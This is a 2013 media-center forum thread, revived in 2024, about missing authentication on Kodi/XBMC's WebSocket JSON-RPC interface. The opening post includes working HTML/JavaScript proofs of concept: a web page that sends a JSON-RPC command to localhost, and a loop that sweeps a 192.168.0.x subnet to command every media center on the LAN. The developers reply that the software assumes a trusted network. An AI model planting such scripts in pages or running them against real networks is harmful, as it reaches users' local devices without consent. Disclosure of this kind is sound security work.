Security, websockets & JSON-RPC
ThePickler
Newbie
Posts: 1
#1
Question  2013-01-13, 16:32
I was a bit surprised by the lack of security features implemented in relation to Websockets and JSON-RPC, seems almost too easy to boobytrap a website.

Example:

Code:
<html>
<script language="javascript" type="text/javascript">
  var websocket = new WebSocket('ws://127.0.0.1:9090/jsonrpc');
  websocket.onopen = function(evt) { websocket.send('{"jsonrpc": "2.0", "method": "System.EjectOpticalDrive"}') };
</script>
</html>

Or if there's a media center with remote access enabled, lets scan the network.

Code:
<html>
<script language="javascript" type="text/javascript">
var local_ips = '192.168.0.';
function tryport(i) {
  console.log('trying ' + i)
  var websocket = new WebSocket('ws://' + local_ips + i + ':9090/jsonrpc');
  websocket.onopen = function(evt) { websocket.send('{"jsonrpc": "2.0", "method": "System.EjectOpticalDrive"}') };
}

for (var i=1; i<256; i++) {
  tryport(i);
};
</script>
</html>

Tested with Windows and Frodo RC3.
Find
Reply
Mizaki
Posting Freak
Posts: 794
#2
2013-01-13, 17:02
I expect that answer you'll get is: XBMC is not secure and is expected to run in a local (friendly) LAN.
Image
AWXi - Ajax web interface. Wiki
Find
Reply
Montellese
Team Kodi Developer
Posts: 5,184
#3
2013-01-13, 17:27
(2013-01-13, 17:02)Mizaki Wrote: I expect that answer you'll get is: XBMC is not secure and is expected to run in a local (friendly) LAN.

What he said. If you don't trust the people in your network, don't enable remote access. It's not only the websocket interface which has this lack of security, the TCP server is the same and if you don't set a password on the webserver, HTTP access is the same.
Always read the online manual (wiki), FAQ (wiki) and search the forum before posting.
Do not e-mail Team Kodi members directly asking for support. Read/follow the forum rules (wiki).
Please read the pages on troubleshooting (wiki) and bug reporting (wiki) before reporting issues.
Find
Reply
amanda91
Newbie
Posts: 1
#4
2024-03-08, 19:37
Implementing robust security measures is crucial when integrating websockets and JSON-RPC. Employing encryption protocols, secure authentication mechanisms, and regularly updating software can fortify the system against potential vulnerabilities. Prioritizing security ensures the reliability and confidentiality of communication, fostering a resilient websockets and JSON-RPC environment.
Find
Reply
jbinkley60
Donor
Posts: 1,691
#5
2024-03-09, 23:29
This has to be close to a new record, responding to an 11+ year old post.


Jeff
Running with the Mezzmo Kodi addon.  The easier way to share your media with multiple Kodi clients.
Service.autostop , CBC Sports, Kodi Selective Cleaner and Mezzmo Kodi addon author.
Find
Reply
selfcontained
Senior Member
Posts: 192
#6
2024-03-10, 15:34
Even if it reads a bit "AI-ish".
Find
Reply
jbinkley60
Donor
Posts: 1,691
#7
2024-03-10, 16:11
(2024-03-10, 15:34)selfcontained Wrote: Even if it reads a bit "AI-ish".

Indeed.  My thought exactly.

Jeff
Running with the Mezzmo Kodi addon.  The easier way to share your media with multiple Kodi clients.
Service.autostop , CBC Sports, Kodi Selective Cleaner and Mezzmo Kodi addon author.
Find
Reply

Home
Search
Help
Logout Mark Read Team Forum Stats Members Help
Security, websockets & JSON-RPC0